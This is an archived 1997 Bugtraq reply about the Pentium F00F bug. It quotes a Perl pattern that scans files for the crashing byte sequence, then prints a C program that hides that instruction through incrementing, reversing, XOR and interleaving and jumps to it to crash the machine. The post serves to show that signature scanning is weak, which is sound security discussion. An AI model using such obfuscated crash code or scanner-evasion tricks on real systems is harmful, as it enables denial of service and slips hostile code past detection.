Bugtraq mailing list archives
Re: Intel Pentium Bug
From: kragen () DNACO NET (Kragen \)
Date: Mon, 10 Nov 1997 07:35:16 -0500
On Sun, 9 Nov 1997, Jason Parsons wrote:
Re the F0 0F C7 C8 Pentuim bug: I just wanted ot repost this from the Linux-security list. Thought it might be helpful to some here. This was posted to Linux-security by Sam Trenholme <set () reality samiam org>. if($data =~ /\xf0\x0f\xc7\xc8/) { print "$dir/$file contains F0 0F C7 C8\n"; }
Is this intended to keep malicious people from crashing your computer? It is trivial to defeat this, and it is impossible, in the general case, to determine whether or not a program can compute f0 0f c7 c8 and execute it. Here are some trivial examples of ways to defeat it: /* * Demonstrate a trivial way to crash a Pentium, f0 0f c7 c8 */ #include <string.h> char incr[] = "\xf1\x10\xc8\xc9"; void fix_incr (char *s) { for (; *s; s++) --*s; } char backwards[] = "\xc8\xc7\x0f\xf0"; void reverse_inner(char *begin, char *end) { while (end > begin) { char t = *end; *end = *begin; *begin = t; end--; begin++; } } void reverse(char *s) { reverse_inner(s, s+strlen(s)-1); } char xored[] = "\xf1\x0e\xc9\xc8"; void xor_pad (char *s, char pad) { for (; *s; s++) *s ^= pad; } char interleaved[] = { 'X', '\xf0', 'Y', '\x0f', 'Z', '\xc7', 'A', '\xc8', '\0'}; void deinterleave (char *s) { char *t = s + 1; for (; *t; t++, t++, s++) *s = *t; } int main() { void (*f)(); fix_incr(incr); reverse(backwards); xor_pad(xored, 1); deinterleave(interleaved); f = incr; /* or backwards, or xored, or interleaved */ (*f)(); } Now, none of these are very subtle. I could easily write something that contained a piece of nonsense text, took the second-to-last bit from each character, and assembled f1 0e c9 c8 from it. The possibilities are endless. A trusted-compiler system seems to be the only possible software protection against attacks like these. Kragen
Current thread:
- IP DOS attacks -- Win95 and WinNT, (continued)
- IP DOS attacks -- Win95 and WinNT Paul Leach (Nov 18)
- Updating microcode on the fly Superuser (Nov 12)
- Re: Updating microcode on the fly Jyri Kaljundi (Nov 12)
- solaris 251 & syslogd Michael Helm (Nov 12)
- Re: solaris 251 & syslogd Richard Peters (Nov 12)
- Re: solaris 251 & syslogd Dave Kinchlea (Nov 12)
- CERT Advisory CA-97.25 - REVISED- Code Correction Aleph One (Nov 12)
- Bug In Security Dynamics' FTP server (Version 2.2) sp00n (Nov 12)
- Intel Pentium Bug: BSDI Releases a patch Joe Ilacqua (Nov 11)
- Re: Intel Pentium Bug Jason Parsons (Nov 09)
- Re: Intel Pentium Bug Kragen \ (Nov 10)
- Possible solution: [Fwd: I figured out how to make my Pentium Miguel Angel Rodriguez Jodar (Nov 10)
- Re: Intel Pentium Bug Tim Newsham (Nov 10)
- CERT Advisory CA-97.25 - CGI_metachar Aleph One (Nov 10)
- Re: CERT Advisory CA-97.25 - CGI_metachar Greg Bacon (Nov 11)
- L0pht Advisory: IE4.0 Petri Helenius (Nov 10)
- Cisco IOS password encryption facts John Bashinski (Nov 10)
- Re: Cisco IOS password encryption facts ice9 (Nov 11)
- Re: Cisco IOS password encryption facts J. Sean Connell (Nov 11)
- Re: Cisco IOS password encryption facts Michael Degerman (Nov 13)